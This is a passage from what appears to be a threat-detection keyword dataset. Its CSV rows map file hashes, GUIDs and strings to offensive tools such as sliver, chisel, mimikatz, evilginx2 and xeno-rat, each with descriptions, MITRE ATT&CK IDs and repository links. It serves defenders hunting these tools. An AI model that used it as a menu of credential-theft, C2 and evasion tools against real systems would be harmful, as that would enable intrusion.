the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*9cb46943dab29908a33b801ec3c2033f7878f19e0ee2f892cd6d0c0db6bdbaa5*",".{0,1000}9cb46943dab29908a33b801ec3c2033f7878f19e0ee2f892cd6d0c0db6bdbaa5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*9cbbb2ac103af9b7940ec72a8e430427d86f5099f7a537e4fe2b72d69e05bdfd*",".{0,1000}9cbbb2ac103af9b7940ec72a8e430427d86f5099f7a537e4fe2b72d69e05bdfd.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*9CCE5C71-14B4-4A08-958D-4E593975658B*",".{0,1000}9CCE5C71\-14B4\-4A08\-958D\-4E593975658B.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*9ceea502f209095ccb4973a18078869931c6b635540f7315d8eccf75055d6f03*",".{0,1000}9ceea502f209095ccb4973a18078869931c6b635540f7315d8eccf75055d6f03.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*9cf730bd8182e8ecc74d6f02dc2eba4dc40d1b50effa30941b522010513baeb6*",".{0,1000}9cf730bd8182e8ecc74d6f02dc2eba4dc40d1b50effa30941b522010513baeb6.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*9D1B853E-58F1-4BA5-AEFC-5C221CA30E48*",".{0,1000}9D1B853E\-58F1\-4BA5\-AEFC\-5C221CA30E48.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" 
"*9d21a5677266c6ff348c79d69e7d2908e121bd5c4d841e9cb4eec90d81ceddd3*",".{0,1000}9d21a5677266c6ff348c79d69e7d2908e121bd5c4d841e9cb4eec90d81ceddd3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9d251c360046d1bb6a5a0d0e4de7c307b91044aa93a9ce6dc74820a01c5bb745*",".{0,1000}9d251c360046d1bb6a5a0d0e4de7c307b91044aa93a9ce6dc74820a01c5bb745.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9D365106-D7B8-4B5E-82CC-6D6ABCDCA2B8*",".{0,1000}9D365106\-D7B8\-4B5E\-82CC\-6D6ABCDCA2B8.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","9","3","286","41","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*9d4774352f398cefc5f715559b274007b59768bd6d1684f7a71d3cc2529097c6*",".{0,1000}9d4774352f398cefc5f715559b274007b59768bd6d1684f7a71d3cc2529097c6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*9d554dae02fa230c3c36b0014f0703b17afdf57a348083472f70688fb44eb912*",".{0,1000}9d554dae02fa230c3c36b0014f0703b17afdf57a348083472f70688fb44eb912.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*9d571b529b8c97f1d95d00147a98ca6a208446100108993377ef74f7bfab0ced*",".{0,1000}9d571b529b8c97f1d95d00147a98ca6a208446100108993377ef74f7bfab0ced.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*9d6afdd06228c999288c7eb473b553b8808587182e6dda734f8fef44ebd1066c*",".{0,1000}9d6afdd06228c999288c7eb473b553b8808587182e6dda734f8fef44ebd1066c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9dc8078d3dbaf1fb1ca922f81df33cc871fef0a2dbe271a6756f9fcc0b6186b7*",".{0,1000}9dc8078d3dbaf1fb1ca922f81df33cc871fef0a2dbe271a6756f9fcc0b6186b7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*9e1a4c27fa18f0126da8e2ea83f8c750e83d529c9fd6897327923c96ac6b3b89*",".{0,1000}9e1a4c27fa18f0126da8e2ea83f8c750e83d529c9fd6897327923c96ac6b3b89.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9e1d32bf24ad4bd2def2368e1442237e0a1cc552b7b1fab4ca491b929141dd13*",".{0,1000}9e1d32bf24ad4bd2def2368e1442237e0a1cc552b7b1fab4ca491b929141dd13.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*9E357027-8AA6-4376-8146-F5AF610E14BB*",".{0,1000}9E357027\-8AA6\-4376\-8146\-F5AF610E14BB.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","0","N/A","8","10","114","12","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*9E5A6F99-0A26-4959-847D-A4221CF4441B*",".{0,1000}9E5A6F99\-0A26\-4959\-847D\-A4221CF4441B.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - 
TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*9e6d326e015aaf3634835f5f7da3579ff477c5b93ea43d349b819925e83a7537*",".{0,1000}9e6d326e015aaf3634835f5f7da3579ff477c5b93ea43d349b819925e83a7537.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9ea9995496c329267d7bfba8f2061b6df43d5db255bc103b14730042e782e5cf*",".{0,1000}9ea9995496c329267d7bfba8f2061b6df43d5db255bc103b14730042e782e5cf.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*9eafa0b3e8005c6b03cb5d2522140021c573b5efd042fcc057a4ff75794c28ea*",".{0,1000}9eafa0b3e8005c6b03cb5d2522140021c573b5efd042fcc057a4ff75794c28ea.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*9eb0701865866d14eb8a85cb2801de1963400fac29467be8e4c253212955d06d*",".{0,1000}9eb0701865866d14eb8a85cb2801de1963400fac29467be8e4c253212955d06d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9eb21ba1323fac7c64c1e03fb3c29e374ab7d99ab9c4d27eb4c3166575769a0f*",".{0,1000}9eb21ba1323fac7c64c1e03fb3c29e374ab7d99ab9c4d27eb4c3166575769a0f.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*9EB8DC3B-60DC-451E-8C18-3D7E38D463FD*",".{0,1000}9EB8DC3B\-60DC\-451E\-8C18\-3D7E38D463FD.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*9ecca3b6c787675d74bbfaa0e3ded77d448a0de4fe51c3c29c07cf3b04b8b71d*",".{0,1000}9ecca3b6c787675d74bbfaa0e3ded77d448a0de4fe51c3c29c07cf3b04b8b71d.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL 
to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*9EE27D63-6AC9-4037-860B-44E91BAE7F0D*",".{0,1000}9EE27D63\-6AC9\-4037\-860B\-44E91BAE7F0D.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*9EFFFF7A-DC03-4D52-BB8F-F0140FAD26E7*",".{0,1000}9EFFFF7A\-DC03\-4D52\-BB8F\-F0140FAD26E7.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*9emin1/charlotte*",".{0,1000}9emin1\/charlotte.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*9f1853b2b8ee03b428bfcad0502959b2a00761471599e3db4c86ab9550df9b69*",".{0,1000}9f1853b2b8ee03b428bfcad0502959b2a00761471599e3db4c86ab9550df9b69.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" 
"*9f19635e335acf9c73acaa6754d100215f3a14a5dfb656abf9dd416237dd3b21*",".{0,1000}9f19635e335acf9c73acaa6754d100215f3a14a5dfb656abf9dd416237dd3b21.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*9f42af7c49f77e716869186e182bee63348dd63dc9f407e08f0ff930a5e5b9db*",".{0,1000}9f42af7c49f77e716869186e182bee63348dd63dc9f407e08f0ff930a5e5b9db.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*9f65528998b39f2e7239f89a56ded47ea865eea2d6b82b300cd5de7e62072cf0*",".{0,1000}9f65528998b39f2e7239f89a56ded47ea865eea2d6b82b300cd5de7e62072cf0.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*9f9039910ee089cd67d3771229526bdab9171ab559d73c2f97bd25da459c6155*",".{0,1000}9f9039910ee089cd67d3771229526bdab9171ab559d73c2f97bd25da459c6155.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9f9675403c2be03232b1c3abe344bf0f4188454955ba89592be52ef77add4a39*",".{0,1000}9f9675403c2be03232b1c3abe344bf0f4188454955ba89592be52ef77add4a39.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*9fc3fe230f30e5b9f9bb15065bf62269f494f51f744857d6b8ac90a9937f5bc0*",".{0,1000}9fc3fe230f30e5b9f9bb15065bf62269f494f51f744857d6b8ac90a9937f5bc0.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*9fd5c3497f76b260c02b579d0d5bf95cef10469e08b02d1b1172a046c35ea07d*",".{0,1000}9fd5c3497f76b260c02b579d0d5bf95cef10469e08b02d1b1172a046c35ea07d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9FEA6712-3880-4E5F-BD56-8E58A4EBCCB4*",".{0,1000}9FEA6712\-3880\-4E5F\-BD56\-8E58A4EBCCB4.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*9ff84ad7a284229d49078e3bda95630c060e7845e94169065b47e285795747ad*",".{0,1000}9ff84ad7a284229d49078e3bda95630c060e7845e94169065b47e285795747ad.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*A cross-platform python based advanced sql injections detection & exploitation tool*",".{0,1000}A\scross\-platform\spython\sbased\sadvanced\ssql\sinjections\sdetection\s\&\sexploitation\stool.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web 
Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*A DNS (over-HTTPS) C2*",".{0,1000}A\sDNS\s\(over\-HTTPS\)\sC2.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*A fast multi protocol credential bruteforcer/sprayer/enumerator*",".{0,1000}A\sfast\smulti\sprotocol\scredential\sbruteforcer\/sprayer\/enumerator.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*A keylogger written in eBPF.*",".{0,1000}A\skeylogger\swritten\sin\seBPF\..{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","0","N/A","10","1","3","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z" "*A La Vie* A L'Amour*",".{0,1000}A\sLa\sVie.{0,1000}\sA\sL\'Amour.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*A Python package for data exfiltration.*",".{0,1000}A\sPython\spackage\sfor\sdata\sexfiltration\..{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*A ruby http/https proxy to do EVIL things.*",".{0,1000}A\sruby\shttp\/https\sproxy\sto\sdo\sEVIL\sthings\..{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*A Silent (Hidden) Free Crypto Miner Builder*",".{0,1000}A\sSilent\s\(Hidden\)\sFree\sCrypto\sMiner\sBuilder.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*a very fast brute force webshell password tool.*",".{0,1000}a\svery\sfast\sbrute\sforce\swebshell\spassword\stool\..{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*a0101bdeeb3f99c0640c203716381ef9f6bad8e89973eaa608c801ed3f6ccace*",".{0,1000}a0101bdeeb3f99c0640c203716381ef9f6bad8e89973eaa608c801ed3f6ccace.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack 
AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*a014358676f18ddbcc1e281a2d21d3fa817bed4c08ad221db34638460d2a24f4*",".{0,1000}a014358676f18ddbcc1e281a2d21d3fa817bed4c08ad221db34638460d2a24f4.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*A017568E-B62E-46B4-9557-15B278656365*",".{0,1000}A017568E\-B62E\-46B4\-9557\-15B278656365.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - 